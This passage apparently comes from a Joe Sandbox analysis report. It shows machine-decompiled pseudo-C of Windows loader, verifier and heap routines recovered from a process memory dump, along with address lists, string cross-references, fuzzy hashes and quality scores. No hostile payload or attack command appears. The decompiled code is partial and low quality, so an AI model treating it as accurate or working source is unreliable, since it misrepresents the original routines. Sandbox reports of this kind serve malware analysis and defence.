				_v8 =  *0x4dab370 ^ (_t45 & 0xfffffff8) - 0x00000068;
				_t26 =  *[fs:0x30];
				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
					_t26 = E04CB0FB0(__ecx, __edx, 0x4da6988, 0x4d31000, 0, 0);
					if( *0x4da3368 > 4 && E04CADE1A(0x4da3368, 0, 0x4000) != 0) {
						_t38 = 0x4c90b50;
						_v100 = _a4;
						_v96 = _a8;
						_v44 =  &_v100;
						_v28 =  &_v104;
						_v60 = "LdrCreateEnclave";
						_v56 = 0;
						_v52 = 0x11;
						_v48 = 0;
						_v40 = 0;
						_v36 = 8;
						_v32 = 0;
						_v104 = __ecx;
						_v24 = 0;
						_v20 = 4;
						_v16 = 0;
						_t26 = E04D3105C(0x4da3368, 0x4c90b50, 0x4da3368, 0x4da3368, 5,  &_v92);
					}
				}
				_pop(_t41);
				_pop(_t44);
				return E04CF4B50(_t26, _t33, _v8 ^ _t47, _t38, _t41, _t44);
			}

0x04d30cee
0x04d30cee
0x04d30cf6
0x04d30d00
0x04d30d04
0x04d30d13
0x04d30d25
0x04d30d31
0x04d30d4e
0x04d30d53
0x04d30d5a
0x04d30d62
0x04d30d6a
0x04d30d77
0x04d30d7f
0x04d30d83
0x04d30d8b
0x04d30d8f
0x04d30d93
0x04d30d9b
0x04d30d9f
0x04d30da3
0x04d30da7
0x04d30daf
0x04d30db3
0x04d30db3
0x04d30d31
0x04d30dbc
0x04d30dbd
0x04d30dc8

Strings

LdrCreateEnclave, xrefs: 04D30D77

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID: LdrCreateEnclave
API String ID: 0-3262589265
Opcode ID: 70915e39611c95172f47cacd3ca2cd7f2336c3b75fdbdfb09c93ef6b4b2311dd
Instruction ID: c6e9ca9be476cc809c37a52536e9f6bda0f2fd27ec165003e4c01298ced119dd
Opcode Fuzzy Hash: 70915e39611c95172f47cacd3ca2cd7f2336c3b75fdbdfb09c93ef6b4b2311dd
Instruction Fuzzy Hash: EA2123B1A083409FD310DF1A8844A9BFBE9FBD5B14F00491EF9A497250D7B0E908CB92

Uniqueness

Uniqueness Score: -1.00%

Function 04D385AA Relevance: 1.3, Strings: 1, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 17%

			E04D385AA(intOrPtr* __ecx) {
				intOrPtr _t9;
				intOrPtr* _t17;
				intOrPtr* _t22;
				intOrPtr* _t23;

				_t9 =  *[fs:0x30];
				_t23 = __ecx;
				if(( *(_t9 + 0x68) & 0x00000100) == 0 ||  *0x4da9231 == 0) {
					return _t9;
				} else {
					E04CBFED0(0x4da5220);
					if(E04D39174( *((intOrPtr*)(_t23 + 0x18))) == 0) {
						_t20 = _t23;
						if(E04D38E06(_t23) < 0) {
							L9:
							_push(0x4da5220);
							return E04CBE740(_t20);
						}
						_t22 =  *0x4da5240; // 0x0
						while(_t22 != 0x4da5240) {
							_t17 =  *((intOrPtr*)(_t22 + 0x1c));
							_t22 =  *_t22;
							if(_t17 != 0) {
								_t20 = _t17;
								 *0x4da91e0( *((intOrPtr*)(_t23 + 0x30)),  *((intOrPtr*)(_t23 + 0x18)),  *((intOrPtr*)(_t23 + 0x20)), _t23);
								 *_t17();
							}
						}
						goto L9;
					}
					E04CAB910("AVRF: AVrfDllUnloadNotification called for a provider (%p) \n", _t23);
					_pop(_t20);
					asm("int3");
					goto L9;
				}
			}

0x04d385aa
0x04d385ba
0x04d385bc
0x04d38632
0x04d385c7
0x04d385cc
0x04d385db
0x04d385ed
0x04d385f6
0x04d38625
0x04d38625
0x00000000
0x04d3862a
0x04d385f8
0x04d3861d
0x04d38600
0x04d38603
0x04d38607
0x04d3860d
0x04d38615
0x04d3861b
0x04d3861b
0x04d38607
0x00000000
0x04d3861d
0x04d385e3
0x04d385e9
0x04d385ea
0x00000000
0x04d385ea

Strings

AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 04D385DE

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
API String ID: 0-702105204
Opcode ID: 602d5badcae16707a94fc88a490384f46c52f8bc45530ad35db26e79be19c4a9
Instruction ID: 4cf189a6c4f93efac579afbed33bd193417a9897c2e9b3e02bf5f61e07336e06
Opcode Fuzzy Hash: 602d5badcae16707a94fc88a490384f46c52f8bc45530ad35db26e79be19c4a9
Instruction Fuzzy Hash: 97012B317002046BE7357F11EC68AAA77F6FF4175EF040868F54117652CB20BC50FAA4

Uniqueness

Uniqueness Score: -1.00%

Function 04CC2760 Relevance: .6, Instructions: 605
COMMONCrypto

Download Yara Rule

C-Code - Quality: 85%

			E04CC2760(signed int __ecx, signed int __edx) {
				intOrPtr _v8;
				signed int _v16;
				signed char _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				signed int _v92;
				signed int _v96;
				signed char _v100;
				signed char _v101;
				signed int _v108;
				signed char _v112;
				signed char _v116;
				signed int _v120;
				signed char _v124;
				signed char _v128;
				signed int _v132;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int* _t226;
				signed int _t229;
				signed int _t232;
				signed int _t233;
				void* _t234;
				intOrPtr _t237;
				signed int _t242;
				signed int _t245;
				signed char _t246;
				intOrPtr _t250;
				signed short _t254;
				signed int _t256;
				signed char _t260;
				void* _t264;
				signed char _t266;
				intOrPtr* _t268;
				signed char _t271;
				signed int _t272;
				signed short _t275;
				signed short _t278;
				signed short _t279;
				signed int _t284;
				signed short _t285;
				signed int _t287;
				void* _t288;
				signed short _t289;
				signed int _t291;
				void* _t292;
				signed char _t297;
				signed short _t299;
				signed char _t301;
				signed short _t320;
				signed short _t322;
				signed short _t323;
				signed int _t325;
				void* _t326;
				signed char _t330;
				signed int _t334;
				signed int _t335;
				void* _t337;
				signed char _t343;
				signed int _t345;
				intOrPtr _t352;
				signed int _t361;
				signed char _t363;
				signed int _t364;
				signed char _t365;
				unsigned int _t370;
				signed int _t374;
				signed char _t378;
				void* _t385;
				signed int _t387;
				signed char _t388;
				signed int _t390;
				signed int _t391;
				signed short _t396;
				signed int _t398;
				signed char _t399;
				unsigned int _t407;
				unsigned int _t409;
				unsigned int _t411;
				unsigned int _t421;
				unsigned int _t424;
				void* _t429;
				signed char _t430;
				signed int _t432;
				signed int _t433;
				signed int _t434;
				signed int _t437;
				void* _t439;
				void* _t445;

				_t386 = __edx;
				_t337 = _t445;
				_v8 =  *((intOrPtr*)(_t337 + 4));
				_t443 = (_t445 - 0x00000008 & 0xfffffff8) + 4;
				_v16 =  *0x4dab370 ^ (_t445 - 0x00000008 & 0xfffffff8) + 0x00000004;
				_t437 = __ecx;
				_v124 =  *(_t337 + 0xc);
				_t339 =  *(_t337 + 8);
				_t226 =  *(_t337 + 0x10);
				_v112 = _t339;
				_v132 = _t226;
				_v120 = 0;
				_v116 = 0;
				_t428 =  *(_t337 + 0x14);
				_v128 = _t428;
				if(_t339 == 0) {
					 *( *[fs:0x18] + 0xbf4) = 0;
					 *((intOrPtr*)( *[fs:0x18] + 0x34)) = E04CDABA0(0);
					L150:
					_t229 = 0;
					L19:
					_pop(_t429);
					_pop(_t439);
					return E04CF4B50(_t229, _t337, _v16 ^ _t443, _t386, _t429, _t439);
				}
				if( *((intOrPtr*)(__ecx + 8)) == 0xddeeddee) {
					_t387 = E04D5D8D2(__edx);
					_t232 =  *(__ecx + 0xb0);
					_v108 = _t387;
					__eflags = _t232;
					if(_t232 != 0) {
						_t352 =  *[fs:0x18];
						__eflags = _t232 -  *((intOrPtr*)(_t352 + 0x24));
						if(_t232 ==  *((intOrPtr*)(_t352 + 0x24))) {
							_t390 = _t387 | 0x00000001;
							__eflags = _t390;
							_v108 = _t390;
						}
					}
					__eflags =  *0x4da38c0 & 0x00000002;
					_t430 = _v112;
					_t343 = _t430;
					if(( *0x4da38c0 & 0x00000002) == 0) {
						_t233 = 0;
						__eflags = 0;
					} else {
						_t233 =  *((intOrPtr*)(_t430 - 8));
						_t343 = _t343 - _t233;
					}
					_t388 = _v108;
					_v120 = _t233;
					_t234 = _t233 + _v124;
					__eflags = _t234 - _v124;
					if(_t234 >= _v124) {
						_t345 = E04D7970B(_t437, _t388, _t343, _t234, _v132, _v128);
						_v116 = _t345;
						__eflags = _t345;
						if(_t345 == 0) {
							goto L33;
						}
						__eflags = _t345 - 0xffffffff;
						if(_t345 == 0xffffffff) {
							goto L33;
						} else {
							__eflags =  *0x4da38c0 & 0x00000002;
							_t386 = _v120;
							if(( *0x4da38c0 & 0x00000002) != 0) {
								 *(_t345 + _t386 - 8) = _t386;
								_t246 = _t345 + _t386;
								__eflags = _t386 - 8;
								if(_t386 > 8) {
									 *_t345 = _t386;
								}
								_v116 = _t246;
							}
							_t245 = _v132;
							__eflags = _t245;
							if(_t245 != 0) {
								 *_t245 =  *_t245 - _t386;
							}
							goto L37;
						}
					} else {
						_t345 = 0;
						__eflags = 0;
						L33:
						asm("sbb ecx, ecx");
						_t55 = ( ~_t345 & 0xffffffee) - 0x3fffffe9; // -1073741801
						_t386 = _t55;
						_v128 = _t386;
						_v116 = 0;
						 *( *[fs:0x18] + 0xbf4) = _t386;
						_t237 = E04CDABA0(_t386);
						__eflags = _v108;
						 *((intOrPtr*)( *[fs:0x18] + 0x34)) = _t237;
						if(_v108 < 0) {
							L35:
							_v100 = _v128;
							_v80 = _v124;
							_push( &_v100);
							_v92 = 0;
							_v84 = 1;
							_v96 = 0;
							_v88 = L04D08A60;
							L04D08A60(0, _t386);
							L36:
							_t430 = _v112;
							L37:
							_t242 = E04CC3C20(_t437);
							__eflags = _t242;
							_t229 = _v116;
							if(_t242 != 0) {
								__eflags = _t229;
								if(_t229 != 0) {
									E04D6E8B1(_t437, _t430);
									_t386 = _v116;
									E04D6DF93(_t437, _v116);
									_t229 = _v116;
								}
							}
							goto L19;
						}
						__eflags =  *(_t437 + 0xc);
						if( *(_t437 + 0xc) >= 0) {
							goto L36;
						}
						goto L35;
					}
				}
				if(_t226 != 0) {
					 *_t226 = 0;
				}
				if(_t428 != 0) {
					 *_t428 = 0;
				}
				_v108 = _t386;
				if(( *(_t437 + 0x44) & 0x01000000) != 0) {
					_t229 = E04D5FDF4(_t337, _t437, _t386, _t428, _t437, __eflags, _t339, _v124);
					goto L19;
				} else {
					if( *0x4da373c != 0) {
						L8:
						if(( *(_t437 + 0x48) & 0x00000001) != 0) {
							_t386 = _t339;
							_t432 = E04CAA4D2(_t337, _t437, _t339, _t428, _t437, __eflags);
							L12:
							_t339 = _v112;
							L13:
							if(_t432 == 0) {
								_t433 = 0xc0000005;
								L148:
								 *( *[fs:0x18] + 0xbf4) = _t433;
								_t250 = E04CDABA0(_t433);
								__eflags = _v108 & 0x00000004;
								 *((intOrPtr*)( *[fs:0x18] + 0x34)) = _t250;
								if((_v108 & 0x00000004) != 0) {
									_v80 = _v124;
									_push( &_v100);
									_v100 = _t433;
									_v92 = 0;
									_v84 = 1;
									_v96 = 0;
									_v88 = L04D08A60;
									L04D08A60(_t339, _t386);
								}
								goto L150;
							}
							if( *((char*)(_t339 - 1)) == 5) {
								__eflags =  *(_t432 + 7);
								if(__eflags >= 0) {
									__eflags =  *(_t437 + 0x4c);
									if( *(_t437 + 0x4c) == 0) {
										L61:
										__eflags =  *(_t432 + 7);
										if( *(_t432 + 7) >= 0) {
											__eflags =  *(_t437 + 0x4c);
											if( *(_t437 + 0x4c) == 0) {
												_t254 =  *_t432 & 0x0000ffff;
											} else {
												_t323 =  *_t432;
												__eflags =  *(_t437 + 0x4c) & _t323;
												if(( *(_t437 + 0x4c) & _t323) != 0) {
													_t323 = _t323 ^  *(_t437 + 0x50);
													__eflags = _t323;
												}
												_t254 = _t323 & 0x0000ffff;
											}
										} else {
											_t421 = _t432 >> 0x00000003 ^  *_t432 ^ _t437 ^  *0x4da6964;
											__eflags = _t421;
											if(_t421 == 0) {
												_t325 = _t432 - (_t421 >> 0xd);
												__eflags = _t325;
												_t326 =  *_t325;
											} else {
												_t326 = 0;
											}
											_t254 =  *((intOrPtr*)(_t326 + 0x14));
										}
										__eflags =  *(_t432 + 7) - 4;
										_t256 = _t254 & 0xffff;
										_v128 = _t256;
										if( *(_t432 + 7) != 4) {
											_t391 = _t256 * 8;
										} else {
											__eflags =  *(_t437 + 0x4c);
											if( *(_t437 + 0x4c) == 0) {
												_t320 =  *_t432 & 0x0000ffff;
											} else {
												_t322 =  *_t432;
												__eflags =  *(_t437 + 0x4c) & _t322;
												if(( *(_t437 + 0x4c) & _t322) != 0) {
													_t322 = _t322 ^  *(_t437 + 0x50);
													__eflags = _t322;
												}
												_t320 = _t322 & 0x0000ffff;
											}
											_t391 =  *((intOrPtr*)(_t432 - 8)) - (_t320 & 0x0000ffff) + _v128;
										}
										__eflags = _t391 + _t432 - _t339;
										if(_t391 + _t432 >= _t339) {
											L84:
											__eflags = _v108 & 0x3c000102;
											_v116 =  *(_t339 - 8);
											if((_v108 & 0x3c000102) != 0) {
												goto L15;
											}
											_t271 =  *((intOrPtr*)(_t339 - 1));
											__eflags = _t271 - 5;
											if(_t271 != 5) {
												__eflags = _t271 & 0x00000040;
												if((_t271 & 0x00000040) == 0) {
													_t396 = 0;
													__eflags = 0;
												} else {
													_t396 = (_t271 & 0x3f) << 0x00000003 & 0x0000ffff;
													_t271 =  *((intOrPtr*)(_t339 - 1));
												}
											} else {
												_t396 = ( *(_t339 - 2) & 0x000000ff) << 0x00000003 & 0x0000ffff;
												_t271 =  *((intOrPtr*)(_t339 - 1));
											}
											_t361 = _t396 & 0x0000ffff;
											_v120 = _t396;
											_v132 = _t361;
											_t339 = _t361 + _v124;
											_v128 = _t339;
											_t386 = _v112 - 8;
											__eflags = _t339 - _v124;
											if(_t339 < _v124) {
												L147:
												_t433 = 0xc0000017;
												goto L148;
											} else {
												_v124 = _t339;
												__eflags = _t271 - 5;
												if(_t271 != 5) {
													_t398 = 0;
													__eflags = 0;
												} else {
													_t398 = _t386 - (( *(_t386 + 6) & 0x000000ff) << 3) + 8;
												}
												_t339 = _v116;
												_t386 = _t437;
												_t272 = E04D578DE(_v116, _t437, _v112, 5, _t398);
												__eflags = _t272;
												if(_t272 >= 0) {
													_t363 =  *(_t432 + 7);
													__eflags = _t363 - 4;
													if(_t363 != 4) {
														__eflags = _t363 - 5;
														if(_t363 != 5) {
															__eflags = _t363 & 0x00000040;
															if((_t363 & 0x00000040) == 0) {
																__eflags = (_t363 & 0x0000003f) - 0x3f;
																if((_t363 & 0x0000003f) == 0x3f) {
																	__eflags = _t363;
																	if(_t363 >= 0) {
																		__eflags =  *(_t437 + 0x4c);
																		if( *(_t437 + 0x4c) == 0) {
																			_t275 =  *_t432 & 0x0000ffff;
																		} else {
																			_t289 =  *_t432;
																			__eflags =  *(_t437 + 0x4c) & _t289;
																			if(( *(_t437 + 0x4c) & _t289) != 0) {
																				_t289 = _t289 ^  *(_t437 + 0x50);
																				__eflags = _t289;
																			}
																			_t275 = _t289 & 0x0000ffff;
																		}
																	} else {
																		_t370 = _t432 >> 0x00000003 ^  *_t432 ^ _t437 ^  *0x4da6964;
																		__eflags = _t370;
																		if(_t370 == 0) {
																			_t291 = _t432 - (_t370 >> 0xd);
																			__eflags = _t291;
																			_t292 =  *_t291;
																		} else {
																			_t292 = 0;
																		}
																		_t275 =  *((intOrPtr*)(_t292 + 0x14));
																	}
																	_t364 =  *(_t432 + (_t275 & 0xffff) * 8 - 4);
																} else {
																	_t364 = _t363 & 0x3f;
																}
															} else {
																_t364 =  *(_t432 + 4 + (_t363 & 0x3f) * 8) & 0x0000ffff;
															}
														} else {
															_t364 =  *(_t437 + 0x54) & 0x0000ffff ^  *(_t432 + 4) & 0x0000ffff;
														}
														_t399 =  *(_t432 + 7);
														_v101 = _t399;
														__eflags = _t399;
														if(_t399 >= 0) {
															__eflags =  *(_t437 + 0x4c);
															if( *(_t437 + 0x4c) == 0) {
																_t278 =  *_t432 & 0x0000ffff;
															} else {
																_t285 =  *_t432;
																__eflags =  *(_t437 + 0x4c) & _t285;
																if(( *(_t437 + 0x4c) & _t285) != 0) {
																	_t285 = _t285 ^  *(_t437 + 0x50);
																	__eflags = _t285;
																}
																_t278 = _t285 & 0x0000ffff;
															}
														} else {
															_t407 = _t432 >> 0x00000003 ^  *_t432 ^ _t437 ^  *0x4da6964;
															__eflags = _t407;
															if(_t407 == 0) {
																_t287 = _t432 - (_t407 >> 0xd);
																__eflags = _t287;
																_t288 =  *_t287;
															} else {
																_t288 = 0;
															}
															_t278 =  *((intOrPtr*)(_t288 + 0x14));
															_t399 = _v101;
														}
														_t365 = _t364 - _v132;
														_t279 = _t278 & 0x0000ffff;
														__eflags = _t365 - 0x3f;
														if(_t365 >= 0x3f) {
															 *(_t432 + (_t279 & 0x0000ffff) * 8 - 4) = _t365;
															_t284 = (_t399 >> 0x0000001f & 0x00000080) + 0x3f;
															__eflags = _t284;
															 *(_t432 + 7) = _t284;
														} else {
															 *(_t432 + 7) = _t399 >> 0x00000007 & 0x00000080 | _t365;
														}
													} else {
														_t374 = _v108;
														_t297 =  *(_t437 + 0x44) | _t374;
														__eflags = _t297 & 0x00000001;
														if((_t297 & 0x00000001) == 0) {
															E04CBFED0( *((intOrPtr*)(_t437 + 0xc8)));
															_t374 = _v108;
														}
														__eflags =  *(_t437 + 0x4c);
														if( *(_t437 + 0x4c) != 0) {
															_t411 =  *(_t437 + 0x50) ^  *_t432;
															 *_t432 = _t411;
															_t378 = _t411 >> 0x00000010 ^ _t411 >> 0x00000008 ^ _t411;
															__eflags = _t411 >> 0x18 - _t378;
															if(__eflags != 0) {
																_push(_t378);
																E04D6D646(_t337, _t437, _t432, _t432, _t437, __eflags);
															}
															_t374 = _v108;
														}
														_t299 =  *_t432 - _v120;
														 *_t432 = _t299;
														__eflags =  *(_t437 + 0x4c);
														_t409 = _t299 & 0x0000ffff;
														if( *(_t437 + 0x4c) != 0) {
															 *(_t432 + 3) = _t409 >> 0x00000008 ^  *(_t432 + 2) ^ _t409;
															 *_t432 =  *_t432 ^  *(_t437 + 0x50);
															__eflags =  *_t432;
														}
														_t301 =  *(_t437 + 0x44) | _t374;
														__eflags = _t301 & 0x00000001;
														if((_t301 & 0x00000001) == 0) {
															_push( *((intOrPtr*)(_t437 + 0xc8)));
															E04CBE740(_t374);
														}
													}
													_t188 = _t432 + 8; // 0xddeeddf6
													_t339 = _t188;
													_v112 = _t188;
													goto L15;
												} else {
													_t433 = 0xc0000005;
													goto L148;
												}
											}
										} else {
											L80:
											_v101 = 0;
											L81:
											_t386 = _t437;
											_t339 = 3;
											E04D75FED(3, _t437, _t432, 3, 0, 0);
											__eflags = _v101;
											if(_v101 != 0) {
												_t339 = _v112;
												goto L84;
											}
											_t433 = 0xc000000d;
											goto L148;
										}
									}
									_t424 =  *(_t437 + 0x50) ^  *_t432;
									__eflags = _t424 >> 0x18 - (_t424 >> 0x00000010 ^ _t424 >> 0x00000008 ^ _t424);
									_t339 = _v112;
									if(_t424 >> 0x18 != (_t424 >> 0x00000010 ^ _t424 >> 0x00000008 ^ _t424)) {
										goto L80;
									}
									goto L61;
								}
								_t330 = E04D71F59(_t337, _t437, _t432, _t432, _t437, __eflags);
								_t339 = _v112;
								_v101 = _t330;
								__eflags = _t330;
								if(_t330 != 0) {
									goto L61;
								}
								goto L81;
							}
							L15:
							_t386 = _v108 | 0x00000002;
							_t434 = E04CC28C0(_t437, _v108 | 0x00000002, _t339, _v124);
							_t260 =  *0x4da6834; // 0x0
							if((_t260 & 0x00000001) != 0) {
								__eflags = _t260 & 0x00000002;
								if((_t260 & 0x00000002) == 0) {
									goto L16;
								}
								_t339 =  *[fs:0x30];
								__eflags =  *(_t339 + 0x18);
								if( *(_t339 + 0x18) == 0) {
									goto L16;
								}
								_push( *0x4da446c);
								_t268 = E04D79682( *0x4da4468);
								__eflags = _t437 -  *_t268;
								if(_t437 ==  *_t268) {
									goto L16;
								}
								__eflags = _t434;
								if(_t434 == 0) {
									L145:
									_v124 = _v124 - (_v120 & 0x0000ffff);
									__eflags = _v116;
									if(_v116 != 0) {
										_t435 = _v112;
										E04CDB870(_t339, _t437, 0, _v112);
										_t264 = E04D5D130(_t437, _v108, _v112, _t339, _v120, _v116);
										_t339 = _v116;
										_t386 = _t437;
										E04D578DE(_v116, _t437, _t264, 6, _t435);
									}
									goto L147;
								}
								_t339 = _v108;
								__eflags = _t339 & 0x10000000;
								if((_t339 & 0x10000000) != 0) {
									L17:
									if(_t434 == 0) {
										goto L145;
									} else {
										_t386 = _v116;
										_t229 = _t434;
										if(_v116 != 0) {
											_t266 = E04D5D130(_t437, _t339, _t434, _t339, _v120, _t386);
											_t386 = _t437;
											_v128 = _t266;
											E04D578DE(_v116, _t437, _t266, 6, _t434);
											_t229 = _v128;
										}
										goto L19;
									}
								}
								E04D6E8B1(_t437, _v112);
								_t386 = _t434;
								E04D6DF93(_t437, _t434);
							}
							L16:
							_t339 = _v108;
							goto L17;
						}
						if((_t339 & 0x00000007) == 0) {
							__eflags =  *((char*)(_t339 - 1)) - 5;
							_t432 = _t339 - 8;
							if( *((char*)(_t339 - 1)) == 5) {
								_t432 = _t432 - (( *(_t432 + 6) & 0x000000ff) << 3);
								__eflags = _t432;
							}
							__eflags =  *(_t432 + 7) & 0x0000003f;
							if(( *(_t432 + 7) & 0x0000003f) != 0) {
								goto L13;
							} else {
								_push(0);
								_push(0);
								_push(0);
								_push(_t432);
								_t385 = 8;
								goto L11;
							}
						} else {
							_push(0);
							_push(0);
							_push(0);
							_push(_t339);
							_t385 = 9;
							L11:
							_t386 = _t437;
							E04D75FED(_t385, _t437);
							_t432 = 0;
							goto L12;
						}
					}
					_t386 =  *(_t437 + 0xdc);
					_t334 =  *(_t437 + 0xdc);
					if(_t334 != 0) {
						L51:
						_t428 = _v124;
						__eflags = _v124 - _t334;
						if(__eflags <= 0) {
							goto L8;
						}
						_t335 =  *(_t437 + 0xe0);
						__eflags = _t335;
						if(_t335 != 0) {
							_t386 = _t437;
							_t339 = 0x14;
							E04D75FED(0x14, _t437, 0, _t335, _t428, _t437);
						}
						goto L147;
					}
					_t334 =  *0x4da4334; // 0x0
					if(_t334 != 0) {
						goto L51;
					}
					goto L8;
				}
			}

0x04cc2760
0x04cc2763
0x04cc2772
0x04cc2776
0x04cc2782
0x04cc2789
0x04cc278b
0x04cc278e
0x04cc2791
0x04cc2794
0x04cc2797
0x04cc279a
0x04cc27a1
0x04cc27a9
0x04cc27ac
0x04cc27b1
0x04d161eb
0x04d161fa
0x04d167f4
0x04d167f4
0x04cc287e
0x04cc2881
0x04cc2884
0x04cc2890
0x04cc2890
0x04cc27be
0x04d16209
0x04d1620b
0x04d16211
0x04d16214
0x04d16216
0x04d16218
0x04d1621f
0x04d16222
0x04d16224
0x04d16224
0x04d16227
0x04d16227
0x04d16222
0x04d1622a
0x04d16231
0x04d16234
0x04d16236
0x04d1623f
0x04d1623f
0x04d16238
0x04d16238
0x04d1623b
0x04d1623b
0x04d16241
0x04d16244
0x04d16247
0x04d1624a
0x04d1624d
0x04d1630a
0x04d1630c
0x04d1630f
0x04d16311
0x00000000
0x00000000
0x04d16317
0x04d1631a
0x00000000
0x04d16320
0x04d16320
0x04d16327
0x04d1632a
0x04d1632c
0x04d16330
0x04d16333
0x04d16336
0x04d16338
0x04d16338
0x04d1633a
0x04d1633a
0x04d1633d
0x04d16340
0x04d16342
0x04d16344
0x04d16344
0x00000000
0x04d16342
0x04d16253
0x04d16253
0x04d16253
0x04d16255
0x04d16264
0x04d16269
0x04d16269
0x04d16272
0x04d16275
0x04d16278
0x04d1627e
0x04d16283
0x04d16287
0x04d1628a
0x04d16292
0x04d16295
0x04d1629b
0x04d162a1
0x04d162a2
0x04d162a9
0x04d162b0
0x04d162b7
0x04d162be
0x04d162c3
0x04d162c3
0x04d162c6
0x04d162c8
0x04d162cd
0x04d162cf
0x04d162d2
0x04d162d8
0x04d162da
0x04d162e4
0x04d162e9
0x04d162ee
0x04d162f3
0x04d162f3
0x04d162da
0x00000000
0x04d162d2
0x04d1628c
0x04d16290
0x00000000
0x00000000
0x00000000
0x04d16290
0x04d1624d
0x04cc27c6
0x04d1634b
0x04d1634b
0x04cc27ce
0x04d16358
0x04d16358
0x04cc27de
0x04cc27e1
0x04d16366
0x00000000
0x04cc27e7
0x04cc27ee
0x04cc280d
0x04cc2811
0x04d1639f
0x04d163a8
0x04cc2831
0x04cc2831
0x04cc2834
0x04cc2836
0x04d163af
0x04d167a4
0x04d167b2
0x04d167b8
0x04d167bd
0x04d167c1
0x04d167c4
0x04d167c9
0x04d167cf
0x04d167d0
0x04d167d3
0x04d167da
0x04d167e1
0x04d167e8
0x04d167ef
0x04d167ef
0x00000000
0x04d167c4
0x04cc2840
0x04d163b9
0x04d163bd
0x04d163d7
0x04d163db
0x04d16400
0x04d16400
0x04d16404
0x04d1642d
0x04d16431
0x04d16442
0x04d16433
0x04d16433
0x04d16435
0x04d16438
0x04d1643a
0x04d1643a
0x04d1643a
0x04d1643d
0x04d1643d
0x04d16406
0x04d1640f
0x04d16415
0x04d16418
0x04d16423
0x04d16423
0x04d16425
0x04d1641a
0x04d1641a
0x04d1641a
0x04d16427
0x04d16427
0x04d16445
0x04d1644c
0x04d1644f
0x04d16452
0x04d16479
0x04d16454
0x04d16454
0x04d16458
0x04d16469
0x04d1645a
0x04d1645a
0x04d1645c
0x04d1645f
0x04d16461
0x04d16461
0x04d16461
0x04d16464
0x04d16464
0x04d16474
0x04d16474
0x04d16483
0x04d16485
0x04d164b0
0x04d164b0
0x04d164ba
0x04d164bd
0x00000000
0x00000000
0x04d164c3
0x04d164c6
0x04d164c8
0x04d164da
0x04d164dc
0x04d164ef
0x04d164ef
0x04d164de
0x04d164e7
0x04d164ea
0x04d164ea
0x04d164ca
0x04d164d2
0x04d164d5
0x04d164d5
0x04d164f1
0x04d164f4
0x04d164fa
0x04d164fd
0x04d16500
0x04d16503
0x04d16506
0x04d16509
0x04d1679f
0x04d1679f
0x00000000
0x04d1650f
0x04d1650f
0x04d16512
0x04d16514
0x04d16524
0x04d16524
0x04d16516
0x04d1651f
0x04d1651f
0x04d1652d
0x04d16530
0x04d16532
0x04d16537
0x04d16539
0x04d16545
0x04d16548
0x04d1654b
0x04d165dc
0x04d165df
0x04d165ed
0x04d165f0
0x04d16603
0x04d16605
0x04d1660f
0x04d16611
0x04d1663a
0x04d1663e
0x04d1664f
0x04d16640
0x04d16640
0x04d16642
0x04d16645
0x04d16647
0x04d16647
0x04d16647
0x04d1664a
0x04d1664a
0x04d16613
0x04d1661c
0x04d16622
0x04d16625
0x04d16630
0x04d16630
0x04d16632
0x04d16627
0x04d16627
0x04d16627
0x04d16634
0x04d16634
0x04d16658
0x04d16607
0x04d1660a
0x04d1660a
0x04d165f2
0x04d165f8
0x04d165f8
0x04d165e1
0x04d165e9
0x04d165e9
0x04d1665c
0x04d1665f
0x04d16662
0x04d16664
0x04d16690
0x04d16694
0x04d166a5
0x04d16696
0x04d16696
0x04d16698
0x04d1669b
0x04d1669d
0x04d1669d
0x04d1669d
0x04d166a0
0x04d166a0
0x04d16666
0x04d1666f
0x04d16675
0x04d16678
0x04d16683
0x04d16683
0x04d16685
0x04d1667a
0x04d1667a
0x04d1667a
0x04d16687
0x04d1668b
0x04d1668b
0x04d166a8
0x04d166ab
0x04d166ae
0x04d166b1
0x04d166c3
0x04d166cf
0x04d166cf
0x04d166d1
0x04d166b3
0x04d166bb
0x04d166bb
0x04d16551
0x04d16554
0x04d16557
0x04d16559
0x04d1655b
0x04d16563
0x04d16568
0x04d16568
0x04d1656b
0x04d1656f
0x04d16574
0x04d16578
0x04d16584
0x04d16589
0x04d1658b
0x04d1658d
0x04d16592
0x04d16592
0x04d16597
0x04d16597
0x04d1659d
0x04d165a1
0x04d165a4
0x04d165a8
0x04d165ab
0x04d165b7
0x04d165bd
0x04d165bd
0x04d165bd
0x04d165c2
0x04d165c4
0x04d165c6
0x04d165cc
0x04d165d2
0x04d165d2
0x04d165c6
0x04d166d4
0x04d166d4
0x04d166d7
0x00000000
0x04d1653b
0x04d1653b
0x00000000
0x04d1653b
0x04d16539
0x04d16487
0x04d16487
0x04d16487
0x04d1648b
0x04d16491
0x04d16493
0x04d16498
0x04d1649d
0x04d164a1
0x04d164ad
0x00000000
0x04d164ad
0x04d164a3
0x00000000
0x04d164a3
0x04d16485
0x04d163e2
0x04d163f5
0x04d163f7
0x04d163fa
0x00000000
0x00000000
0x00000000
0x04d163fa
0x04d163c3
0x04d163c8
0x04d163cb
0x04d163ce
0x04d163d0
0x00000000
0x00000000
0x00000000
0x04d163d2
0x04cc2846
0x04cc284d
0x04cc2857
0x04cc2859
0x04cc2860
0x04d166df
0x04d166e1
0x00000000
0x00000000
0x04d166e7
0x04d166ee
0x04d166f2
0x00000000
0x00000000
0x04d166f8
0x04d16704
0x04d16709
0x04d1670b
0x00000000
0x00000000
